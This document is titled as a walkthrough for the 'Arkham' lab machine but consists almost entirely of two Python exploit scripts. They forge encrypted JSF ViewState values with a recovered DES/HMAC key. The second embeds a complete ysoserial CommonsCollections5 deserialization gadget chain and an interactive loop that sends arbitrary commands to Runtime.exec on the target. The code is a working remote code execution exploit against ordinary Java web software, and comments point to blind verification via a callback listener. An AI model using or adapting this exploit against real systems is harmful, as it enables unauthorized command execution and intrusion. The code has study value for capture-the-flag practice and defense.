Arkham Walkthrough
#!/usr/bin/env python3
from requests import post
from base64 import b64encode, b64decode
from hashlib import sha1
from pyDes import des, ECB, PAD_PKCS5
import hmac
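def create_payload(path: str = "payload.bin") -> bytes:
    """Read a pre-built serialized Java object from disk and wrap it as a ViewState.

    Args:
        path: File holding the raw (not yet encrypted) serialized payload. Defaults
            to ``payload.bin`` in the working directory, as the original script did.

    Returns:
        The base64-encoded ``DES-ECB(payload) || HMAC-SHA1`` blob produced by
        ``encrypt_payload``.

    Raises:
        ValueError: if the file is empty.
        OSError: if the file cannot be opened or read.
    """
    with open(path, "rb") as fh:
        raw = fh.read()
    # The original compared the bytes object against the str "" - that is always
    # False under Python 3, so an empty file slipped through and produced an
    # "encrypted" blob consisting of nothing but PKCS5 padding. Use truthiness.
    if not raw:
        raise ValueError("Payload should not be empty!")
    return encrypt_payload(raw)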
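def encrypt_payload(payload: bytes, key: bytes | None = None, mac_key: bytes | None = None) -> bytes:
    """Encrypt and authenticate a ViewState the way the target expects.

    Layout is encrypt-then-MAC: ``DES-ECB/PKCS5(payload) || HMAC-SHA1(ciphertext)``,
    then base64 the whole thing. The HMAC is computed over the ciphertext only and
    is appended after it (a 20-byte tag). This matches the DES/ECB + HmacSHA1
    defaults of JSF client-side state saving - presumably Apache MyFaces here, but
    the script does not show which implementation the target runs.

    Args:
        payload: Raw serialized Java object to protect.
        key: 8-byte DES key. Defaults to the hard-coded key recovered for this lab
            target; pass your own when reusing the script elsewhere.
        mac_key: Key for the HMAC. Defaults to ``key`` - the original script reused
            the cipher key for the MAC, which is what this target accepted.

    Returns:
        base64-encoded ``ciphertext || tag`` as ``bytes``.

    Raises:
        ValueError: if ``key`` is not exactly 8 bytes (DES has no other size).

    Security note: DES is a 56-bit cipher and ECB has no IV, so identical plaintext
    blocks produce identical ciphertext blocks. That weakness is the target's, not
    something this function can fix - it simply has to match what the server does.
    """
    if key is None:
        key = b64decode("SnNGOTg3Ni0=")  # decodes to an 8-byte DES key
    if len(key) != 8:
        raise ValueError("DES key must be exactly 8 bytes")
    if mac_key is None:
        mac_key = key
    crypter = des(key, ECB, padmode=PAD_PKCS5)
    ciphertext = bytes(crypter.encrypt(payload))
    tag = hmac.new(mac_key, ciphertext, sha1).digest()
    return b64encode(ciphertext + tag)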
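def exploit_arkham(url: str = "http://10.10.10.130:8080/userSubscribe.faces", timeout: float = 10):
    """POST the forged ViewState from ``payload.bin`` to the target and print the reply.

    Args:
        url: The JSF page that restores ``javax.faces.ViewState``. Defaults to the
            lab target address baked into the original script.
        timeout: Seconds to wait for connect/read. ``requests`` waits forever
            without one, which hides a dead or hung target.

    Returns:
        The ``requests.Response`` so a caller can inspect status code or body; the
        body is also printed, as in the original script.
    """
    view_state = create_payload()
    data = {'javax.faces.ViewState': view_state}
    resp = post(url, data=data, timeout=timeout)
    print(resp.text)
    return resp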
if __name__ == "__main__":
    # Script entry point: reads payload.bin, forges one ViewState and prints the reply.
    exploit_arkham()
#!/usr/bin/env python3
from requests import post
from base64 import b64encode, b64decode
from hashlib import sha1
import pyDes
import hmac
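def create_payload(cmd: str) -> bytes:
    """Build the encrypted ViewState carrying a CommonsCollections5 gadget chain.

    The byte blob below is a Java serialization stream (magic ``AC ED 00 05``).
    The class names embedded in it - ``javax.management.BadAttributeValueExpException``,
    ``ysoserial.payloads.CommonsCollections5``, ``TiedMapEntry``, ``LazyMap``,
    ``ChainedTransformer``, ``ConstantTransformer``, ``InvokerTransformer`` - and the
    method names ``getRuntime`` / ``getMethod`` / ``invoke`` / ``exec`` show it was
    produced by ysoserial's CommonsCollections5 payload. ``cmd`` is spliced into the
    single-element ``String[]`` that ends up as the argument of ``Runtime.exec``.

    Args:
        cmd: Command line handed to ``Runtime.exec(String)`` on the target. Note that
            ``exec(String)`` splits on whitespace and does not go through a shell, so
            pipes, redirects and quoting only work when you wrap the command yourself
            (the original hard-coded example was ``cmd /c ping -n 2 10.10.14.37``).
            Keep it ASCII: Java's modified UTF-8 differs from standard UTF-8 for
            U+0000 and for characters outside the BMP.

    Returns:
        base64 of ``DES-ECB(stream) || HMAC-SHA1`` from ``encrypt_payload``.

    Raises:
        ValueError: if the command is empty or longer than 65535 bytes, the maximum a
            ``TC_STRING`` (0x74) length field can describe.
    """
    cmd_bytes = cmd.encode("utf-8")
    if not cmd_bytes:
        raise ValueError("Command should not be empty!")
    if len(cmd_bytes) > 0xFFFF:
        raise ValueError("Command too long for a 2-byte TC_STRING length field")

    # Everything up to, but not including, the 2-byte length of the command string.
    # The final 0x74 is the TC_STRING tag for the String[] element holding cmd.
    prefix = (
        b'\xac\xed\x00\x05\x73\x72\x00\x2e\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x42\x61\x64\x41\x74',
        b'\x74\x72\x69\x62\x75\x74\x65\x56\x61\x6c\x75\x65\x45\x78\x70\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd4\xe7\xda\xab\x63\x2d',
        b'\x46\x40\x02\x00\x01\x4c\x00\x03\x76\x61\x6c\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63',
        b'\x74\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a',
        b'\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5',
        b'\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e',
        b'\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x74\x00',
        b'\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61',
        b'\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65',
        b'\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00',
        b'\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x08\x70\x75\x72\x00\x1e\x5b',
        b'\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02',
        b'\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x03\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e',
        b'\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x08\x42\x00',
        b'\x06\x66\x6f\x72\x6d\x61\x74\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0f\x63\x6c\x61\x73\x73\x4c\x6f',
        b'\x61\x64\x65\x72\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73',
        b'\x71\x00\x7e\x00\x05\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64',
        b'\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x6f\x64\x75\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0d',
        b'\x6d\x6f\x64\x75\x6c\x65\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x01\x00\x00\x00\x51\x74\x00\x03\x61\x70',
        b'\x70\x74\x00\x26\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x70\x61\x79\x6c\x6f\x61\x64\x73\x2e\x43\x6f\x6d\x6d\x6f\x6e\x73',
        b'\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x35\x74\x00\x18\x43\x6f\x6d\x6d\x6f\x6e\x73\x43\x6f\x6c\x6c\x65\x63\x74\x69',
        b'\x6f\x6e\x73\x35\x2e\x6a\x61\x76\x61\x74\x00\x09\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x70\x70\x73\x71\x00\x7e\x00\x0b\x01',
        b'\x00\x00\x00\x33\x71\x00\x7e\x00\x0d\x71\x00\x7e\x00\x0e\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00\x10\x70\x70\x73\x71\x00\x7e',
        b'\x00\x0b\x01\x00\x00\x00\x22\x71\x00\x7e\x00\x0d\x74\x00\x19\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x47\x65\x6e\x65\x72',
        b'\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x74\x00\x14\x47\x65\x6e\x65\x72\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x2e\x6a',
        b'\x61\x76\x61\x74\x00\x04\x6d\x61\x69\x6e\x70\x70\x73\x72\x00\x1f\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c',
        b'\x65\x63\x74\x69\x6f\x6e\x73\x24\x45\x6d\x70\x74\x79\x4c\x69\x73\x74\x7a\xb8\x17\xb4\x3c\xa7\x9e\xde\x02\x00\x00\x78\x70',
        b'\x78\x73\x72\x00\x34\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63',
        b'\x74\x69\x6f\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79\x8a\xad\xd2',
        b'\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c\x00\x03\x6b\x65\x79\x71\x00\x7e\x00\x01\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c\x6a',
        b'\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x78\x70\x74\x00\x03\x66\x6f\x6f\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61',
        b'\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e',
        b'\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00',
        b'\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f',
        b'\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68',
        b'\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73',
        b'\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01',
        b'\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68',
        b'\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72',
        b'\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73',
        b'\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8',
        b'\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d',
        b'\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73',
        b'\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69',
        b'\x43\x6f\x6e\x73\x74\x61\x6e\x74\x71\x00\x7e\x00\x01\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52',
        b'\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61',
        b'\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f',
        b'\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02',
        b'\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63',
        b'\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d',
        b'\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72',
        b'\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02',
        b'\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76',
        b'\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00',
        b'\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61',
        b'\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00',
        b'\x2f\x73\x71\x00\x7e\x00\x28\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x00\x74\x00',
        b'\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67',
        b'\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x2c\x73\x71\x00\x7e',
        b'\x00\x28\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9',
        b'\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74',
    )
    # Everything after the command string: the "exec" method name, the Integer
    # argument and the trailing HashMap that closes the LazyMap.
    suffix = (
        b'\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x01',
        b'\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x24\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67',
        b'\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e',
        b'\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72',
        b'\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02',
        b'\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00',
        b'\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78',
    )

    # TC_STRING carries a big-endian 2-byte length of the (modified) UTF-8 bytes.
    # The original wrote chr(len(cmd)).encode(): for len >= 128 that UTF-8-encodes
    # the code point into 2+ bytes and corrupts the stream, and it counted
    # characters rather than encoded bytes. Emit the real 16-bit length instead.
    stream = b"".join(prefix) + len(cmd_bytes).to_bytes(2, "big") + cmd_bytes + b"".join(suffix)
    return encrypt_payload(stream)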
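def encrypt_payload(payload: bytes, key: bytes | None = None, mac_key: bytes | None = None) -> bytes:
    """Encrypt and authenticate a serialized object the way the target's ViewState expects.

    Encrypt-then-MAC: ``DES-ECB/PKCS5(payload) || HMAC-SHA1(ciphertext)``, base64
    encoded. The 20-byte tag is computed over the ciphertext only and appended after
    it. This matches the DES/ECB + HmacSHA1 defaults of JSF client-side state saving
    (presumably Apache MyFaces on this target; the script itself does not say).

    Args:
        payload: Raw Java serialization stream to protect.
        key: 8-byte DES key. Defaults to the hard-coded key recovered for this lab
            target - override it when pointing the script at anything else.
        mac_key: HMAC key. Defaults to ``key``; the original script reused the cipher
            key for the MAC and the target accepted that.

    Returns:
        base64-encoded ``ciphertext || tag`` as ``bytes``.

    Raises:
        ValueError: if ``key`` is not exactly 8 bytes.

    Security note: DES (56-bit) in ECB mode (no IV) is weak - equal plaintext blocks
    give equal ciphertext blocks. That is the server's configuration; this function
    only has to reproduce it.
    """
    if key is None:
        key = b64decode("SnNGOTg3Ni0=")  # decodes to an 8-byte DES key
    if len(key) != 8:
        raise ValueError("DES key must be exactly 8 bytes")
    if mac_key is None:
        mac_key = key
    cipher = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
    ciphertext = bytes(cipher.encrypt(payload))
    tag = hmac.new(mac_key, ciphertext, sha1).digest()
    return b64encode(ciphertext + tag)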
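def exploit_arkham(cmd: str, url: str = "http://10.10.10.130:8080/userSubscribe.faces", timeout: float = 10):
    """Send one command to the target inside a forged ``javax.faces.ViewState``.

    Args:
        cmd: Command line for ``Runtime.exec`` on the target (see ``create_payload``).
        url: JSF page that restores the ViewState. Defaults to the lab target address
            the original script was written against.
        timeout: Seconds to wait for connect/read; without it ``requests`` blocks
            forever on a hung target, which would freeze the interactive loop.

    Returns:
        The ``requests.Response``. The original discarded it; the command executes
        during ViewState restoration, so its output is not expected in the body -
        verify blind (e.g. a ping or callback to a listener you control) and use the
        status code only as a sanity check that the request was accepted.
    """
    data = {'javax.faces.ViewState': create_payload(cmd)}
    return post(url, data=data, timeout=timeout)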
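if __name__ == "__main__":
    # Minimal REPL: every line typed is sent as its own forged ViewState.
    # Ctrl-C / Ctrl-D end the loop cleanly instead of dumping a traceback,
    # and blank lines are skipped rather than sent as an empty exec().
    try:
        while True:
            cmd = input("=> ")
            if not cmd.strip():
                continue
            exploit_arkham(cmd)
    except (EOFError, KeyboardInterrupt):
        print()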